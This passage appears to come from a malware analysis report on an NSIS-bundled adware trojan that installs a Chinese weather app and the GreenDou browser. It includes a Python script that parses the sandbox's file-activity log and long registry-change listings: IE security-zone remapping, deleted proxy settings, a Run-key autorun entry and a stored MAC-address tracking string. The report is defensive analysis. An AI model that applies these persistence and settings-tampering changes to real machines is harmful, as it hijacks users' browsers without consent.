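%Documents and Settings%\All Users\Start Menu\Programs\worldweather\大众天气预报.lnk (943 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (0 bytes)
The process %original file name%.exe:204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\processwork.dll (6140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\365weatherIns_61.exe (119257 bytes)
%Program Files%\greeou\GreenDou.exe (25123 bytes)
%Documents and Settings%\%current user%\Desktop\绿豆浏览器.lnk (666 bytes)
The process greendou.exe:772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\greeou\profile\Defaults\config.ini (4 bytes)
"""


def parse_file_activity(text):
    """One event per file line: process, pid, action (write/delete), path, size."""
    events, proc, pid, action = [], None, None, None
    for raw in text.splitlines():
        line = raw.strip()
        m = PROCESS_RE.match(line)
        if m:
            proc, pid, action = m.group("name"), int(m.group("pid")), None
            continue
        if line.startswith("The Trojan creates and/or writes"):
            action = "write"
            continue
        if line.startswith("The Trojan deletes"):
            action = "delete"
            continue
        m = FILE_RE.match(line)
        if m and proc and action:
            events.append({"process": proc, "pid": pid, "action": action,
                           "path": m.group("path"), "size": int(m.group("size"))})
    return events


def basename(path):
    return path.rsplit("\\", 1)[-1]


def dropper_chain(events):
    """Map each process image name to the process that first wrote a file of that
    name; this reconstructs sample -> bundled installer -> installed program."""
    first_writer = {}
    for e in events:
        if e["action"] == "write":
            first_writer.setdefault(basename(e["path"]).lower(), e["process"])
    chain = {}
    for proc in {e["process"] for e in events}:
        parent = first_writer.get(proc.lower())
        if parent and parent.lower() != proc.lower():
            chain[proc] = parent
    return chain


def nsis_staging(events):
    """Plug-in DLLs unpacked into the NSIS temp directory, grouped by process."""
    staged = defaultdict(set)
    for e in events:
        if e["action"] == "write" and NSIS_TMP_RE.search(e["path"]):
            staged[e["process"]].add(basename(e["path"]))
    return dict(staged)


def pe_drops(events):
    """Executables and DLLs written anywhere other than the NSIS staging dir."""
    return sorted((e["process"], e["path"]) for e in events
                  if e["action"] == "write"
                  and e["path"].lower().endswith(PE_EXT)
                  and not NSIS_TMP_RE.search(e["path"]))


def shortcuts(events):
    """.lnk files in Start Menu / Desktop: the user-visible face of the install."""
    return sorted(e["path"] for e in events
                  if e["action"] == "write" and e["path"].lower().endswith(".lnk"))


if __name__ == "__main__":
    ev = parse_file_activity(SAMPLE)
    for child, parent in sorted(dropper_chain(ev).items()):
        print(f"{parent} -> {child}")
    for proc, dlls in nsis_staging(ev).items():
        print(f"NSIS plug-ins staged by {proc}: {', '.join(sorted(dlls))}")
    for proc, path in pe_drops(ev):
        print(f"PE dropped by {proc}: {path}")
    for path in shortcuts(ev):
        print(f"shortcut: {path}")
```

Run against the full section, the chain shows the sample (%original file name%.exe) writing both 365weatherIns_61.exe and GreenDou.exe, and 365weatherIns_61.exe in turn writing worldweather.exe and its helpers, which is the bundled-installer pattern the "Trojan.NSIS.StartPage" detection name points at. The plug-in names in the staging set (inetc, NSISdl, KillProcDLL, processwork) are worth extracting on their own: they tell you the installer can download, kill processes and enumerate them without any of that code living in the dropped executables.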
Registry activity
The process worldweather.exe:2452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\worldweather\5.0.0.5002]
"worldWeatherUpdate.5002.exe" = "天气预报升级核心" (mis-encoded UTF-8 repaired; "Weather Forecast Update Core")
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF 2A 97 12 A0 AE 25 AF 75 E8 94 21 60 E7 8F 4E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process worldWeatherUpdate.5002.exe:2896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 21 C5 C1 17 8D 54 C2 04 DE FB 24 47 6F 13 AE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 365weatherIns_61.exe:408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"UninstallString" = "%Program Files%\worldweather\5.0.0.5002\uninst.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"index" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\365weatherIns_61.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"jieguo" = "mac=00-0C-29-8A-8B-37&soft_id=33&tuiguang_id=C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\365weatherIns_61.exe&yanzheng=318d97cc71dd4de571edddf8241ae5c0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"DisplayIcon" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"mac" = "00-0C-29-8A-8B-37"
"(Default)" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"collection" = "%Documents and Settings%\%current user%\Favorites"
"menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"desk" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D B8 5F 28 37 98 B9 A7 C4 46 72 83 47 4B 1F F9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"URLInfoAbout" = "http://weather.22pk.cn/"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"Publisher" = "大众天气工作室"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\worldweather]
"5.0.0.5002/worldWeatherRealTime5002.exe" = "worldWeatherRealTime5002.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"DisplayVersion" = "5.0.0.5002"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"DisplayName" = "大众天气预报 5.0.0.5002"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"worldweather5002" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe /autorun"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process greendou.exe:772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32]
"(Default)" = "%Program Files%\Internet Explorer\IEXPLORE.EXE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shell32.dll,-12693" = "Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014051320140514]
"CacheOptions" = "11"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014051320140514]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014051320140514\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014051320140514]
"CacheRepair" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "greendou.exe"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014051320140514]
"CacheLimit" = "8192"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1244086619"
[HKCU\Software\Gie]
"update2" = "2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 BF 3D E6 6D 66 76 3F 2B C6 4D 0F 9F ED 49 E4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014051320140514]
"CachePrefix" = ":2014051320140514:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\System\CurrentControlSet\Services\Tcpip\Performance]
"Error Count"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
The process %original file name%.exe:204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\绿豆浏览器]
"Publisher" = "ico10"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\绿豆浏览器]
